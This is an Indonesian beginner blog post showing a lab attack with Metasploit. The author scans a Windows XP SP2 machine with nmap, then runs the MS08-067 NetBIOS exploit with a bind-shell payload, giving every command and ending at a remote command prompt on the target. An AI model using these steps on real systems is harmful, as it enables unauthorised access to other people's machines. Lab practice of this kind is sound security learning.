Ternyata hacking itu bisa jadi gampang banget kalau kita menggunakan tool yang bagus seperti Metasploit dan menemukan target yang rentan untuk dijadikan sasaran hacking. Cukup denga menginstall Metasploit Framework, mengetikkan kata kunci “metasploit tutorial” di Google, mencari target menggunakan nmap, menjalankan exploit di Metasploit, maka kita sudah dapat menguasai sistem operasi target (kalau beruntung ). Kalau dihitung, kita hanya mengetikkan beberapa perintah saja dari terminal untuk menguasai target (tentu saja targetnya harus vulnerable). Nah, di artikel ini saya akan mencoba menuliskan secara singkat bagaimana menggunakan Metasploit untuk mengekploitasi bug di service NetBIOS Windows XP SP2 . Kalau merasa masih n00b seperti saya, lanjutkan membaca tapi kalau sudah terbiasa dengan msf silakan ambil langkah seribu.
Skenario dan Kebutuhan SoftwareDi artikel ini, saya menggunakan dua PC untuk melakukan simulasi hacking kecil-kecilan. Sistem operasi yang digunakan hacker (biar keren jeh ) adalah Ubuntu 10.04, sedangkan target menggunakan Windows XP SP2. Kedua PC ini berada di jaringan dengan subnet yang sama, yaitu 10.10.10.128/25 di mana si hacker menggunakan IP 10.10.10.232/25 dan IP target 10.10.10.251/25. Di Ubuntu yang digunakan si hacker sudah terinstall nmap dan msf aka Metasploit Framework versi 3.4.2-dev. nmap dapat diinstall dari repo menggunakan package manager milik Ubuntu, sedangkan msf harus diinstall secara manual menggunakan petunjuk di sini.
Scanning Target
Walaupun sebenarnya kita sudah tahu bahwa sistem operasi target adalah Windows XP SP2 yang menjalankan service NetBIOS, namun dalam skenario ini kita akan berpura-pura tidak tahu. Oleh karena itu kita akan melakukan scanning menggunakan nmap untuk melihat apakah target bisa dieksploitasi. Dari PC hacker yang menggunakan Ubuntu Lucid Lynx, buka aplikasi terminal lalu jalankan nmap dengan mengetik:
1 | nmap -A -T4 10.10.10.251 |
Exploit The Target
Kita boleh tersenyum karena target kelihatannya vulnerable. Sekarang waktunya menjalankan Metasploit, kembali ke terminal:
1 | msfconsole |
Dari prompt tersebutlah kita akan menjalankan perintah-perintah Metasploit untuk mengekploitasi target. Untuk skenario ini, jalankan perintah:
1 | use windows/smb/ms08_067_netapi |
2 | set RHOST 10.10.10.251 |
3 | set PAYLOAD generic/shell_bind_tcp |
Lalu jalankan exploit:
1 | exploit |
Perhatikan ciri-ciri dari command prompt sistem operasi Windows, artinya kita sudah masuk di sistem target. Selanjutnya? Terserah anda.
Segampang itukah? Saya juga kurang mengerti karena saya masih kurang pengalaman di bidang ini, bagaimana menurut anda?
0 komentar: on "Nyoba Hacking Ala n00b Pake Metasploit 3"
Post a Comment